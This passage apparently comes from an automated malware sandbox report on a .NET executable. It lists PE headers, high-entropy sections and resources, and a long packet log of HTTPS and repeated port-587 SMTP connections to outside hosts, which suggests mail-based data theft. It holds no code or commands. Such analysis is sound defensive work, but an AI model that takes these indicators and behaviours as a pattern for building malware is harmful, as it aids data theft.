                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xbdad40xbdc0072cf1ef7b5237c66d8cbed6c8962ae87False0.8815129899538867data7.712111849426876IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xc00000x1bb00x1c005e8ecb634f10cec6174664c312e93000False0.8684430803571429data7.3779338294066035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xc20000xc0x2007b7f28c871c987033b039edd355a293dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xc00e80x174ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9639624539054643
                                                        RT_GROUP_ICON0xc18380x14data1.05
                                                        RT_VERSION0xc184c0x360data0.42476851851851855

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 6, 2024 09:57:57.998064041 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:57.998090029 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:57.998281956 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:58.007416010 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:58.007430077 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.229891062 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.229959011 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:59.267081976 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:59.267096043 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.267390013 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.309943914 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:59.450261116 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:59.491337061 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.779881001 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.779953957 CET44349709104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:57:59.779999018 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:57:59.786351919 CET49709443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:00.872610092 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:00.992490053 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:00.992643118 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:02.258879900 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:02.259371996 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:02.381863117 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:02.704390049 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:02.704605103 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:02.824351072 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:03.148261070 CET5874971177.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:03.185852051 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:03.185889959 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:03.186000109 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:03.192867041 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:03.192883015 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:03.325562954 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:03.726162910 CET49711587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:04.410502911 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:04.410702944 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:04.414333105 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:04.414346933 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:04.426496029 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:04.513102055 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:05.343673944 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:05.387341022 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:05.674933910 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:05.675019979 CET44349713104.26.13.205192.168.2.8
                                                        Dec 6, 2024 09:58:05.675146103 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:05.677901983 CET49713443192.168.2.8104.26.13.205
                                                        Dec 6, 2024 09:58:06.189508915 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:06.309452057 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:06.310074091 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:07.788992882 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:07.851206064 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:07.971899986 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:08.292675972 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:08.292859077 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:08.412736893 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:08.735126019 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:08.735563993 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:08.855557919 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.178658962 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.178720951 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.178734064 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.178761005 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:09.178798914 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.178853035 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:09.197108030 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:09.316777945 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.638652086 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:09.644146919 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:09.764487028 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:10.088234901 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:10.104456902 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:10.224205971 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:10.546135902 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:10.591252089 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:10.736670017 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:10.856605053 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:11.203340054 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:11.203675985 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:11.323657036 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:11.658926964 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:11.659317970 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:11.779027939 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.214256048 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.214777946 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:12.334588051 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.657191992 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.657996893 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:12.658062935 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:12.658090115 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:12.658111095 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:58:12.777739048 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.777756929 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.777848959 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:12.777862072 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:13.850297928 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:58:13.903697014 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:28.850274086 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:28.850337982 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:39.343899012 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:39.344284058 CET49714587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:39.345334053 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:39.464987993 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:39.465203047 CET5874971477.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:39.465974092 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:39.466037035 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:40.752027035 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:40.754328012 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:40.874087095 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:41.197756052 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:41.197930098 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:41.317713976 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:41.641289949 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:41.641702890 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:41.761461973 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.086947918 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.086996078 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.087007999 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.087060928 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.087204933 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:42.090797901 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:42.210599899 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.534595013 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.536459923 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:42.656301022 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.979836941 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:42.980418921 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:43.100164890 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:43.423970938 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:43.424253941 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:43.544774055 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:43.892364979 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:43.900346041 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:43.982966900 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:44.020252943 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:44.074158907 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:44.103562117 CET5874971777.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:44.103699923 CET49717587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:44.193984985 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:44.194133043 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:45.472902060 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:45.473053932 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:45.592771053 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:45.910792112 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:45.914331913 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:46.034312010 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.352365971 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.352770090 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:46.472583055 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.792593956 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.792630911 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.792644978 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.792668104 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:46.792745113 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:46.792840958 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:46.798221111 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:46.918108940 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:47.236342907 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:47.238890886 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:47.358601093 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:47.676728010 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:47.677012920 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:47.796729088 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:48.114640951 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:48.115026951 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:48.236464977 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:48.579737902 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:48.579973936 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:48.699807882 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:49.032316923 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:49.032496929 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:49.152234077 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:49.580774069 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:49.580988884 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:49.701220989 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.019237995 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.035084009 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.035203934 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.035274029 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.035351038 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.036998034 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.154900074 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.154953003 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.154966116 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.155044079 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.155097961 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.156497955 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.156802893 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.156861067 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.156893015 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.156936884 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.157970905 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.158036947 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.158130884 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.158238888 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.159003973 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.159013987 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.159025908 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.159035921 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.159046888 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.159077883 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.159106970 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.159106970 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.274924994 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.276340008 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.276789904 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.276982069 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.277328968 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.277362108 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.277755976 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.277790070 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.277946949 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.277981043 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.278947115 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.278985023 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.279031992 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.279062986 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.279171944 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.279206991 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.279242039 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.279273033 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.279297113 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.279326916 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.280471087 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.320707083 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.322489977 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.396852970 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.396914005 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.397226095 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.397286892 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.397883892 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.397916079 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.398006916 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.398040056 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.398094893 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.398133039 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.398143053 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.398169041 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.398735046 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.398844957 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.398972988 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399040937 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399089098 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399118900 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399302006 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399322987 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399524927 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399550915 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399637938 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399646997 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399729967 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399739981 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.399780989 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.400232077 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.400262117 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.400356054 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.400367022 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.442342043 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.442394018 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.490355968 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.490578890 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.490578890 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 09:59:50.517414093 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517445087 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517462969 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517472029 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517518044 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517575026 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517664909 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517676115 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517838955 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517849922 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517924070 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.517932892 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518042088 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518117905 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518166065 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518177032 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518269062 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518279076 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518361092 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518387079 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518428087 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.518436909 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:50.610958099 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:51.751527071 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 09:59:51.840976000 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:03.709134102 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:03.828828096 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:04.146894932 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:04.147274971 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:04.147336006 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:04.147380114 CET49718587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:04.148413897 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:04.267139912 CET5874971877.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:04.268205881 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:04.268269062 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:05.703500032 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:05.703707933 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:05.823350906 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:06.209274054 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:06.209403992 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:06.329404116 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:06.716888905 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:06.717456102 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:06.837232113 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.213450909 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.213515997 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.213527918 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.213567019 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.213650942 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.213650942 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.215341091 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.335128069 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.705070972 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.712220907 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.713742971 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.770688057 CET49720587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.825145960 CET5874971977.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.825265884 CET49719587192.168.2.877.88.21.158
                                                        Dec 6, 2024 10:00:07.890485048 CET5874972077.88.21.158192.168.2.8
                                                        Dec 6, 2024 10:00:07.893510103 CET49720587192.168.2.877.88.21.158
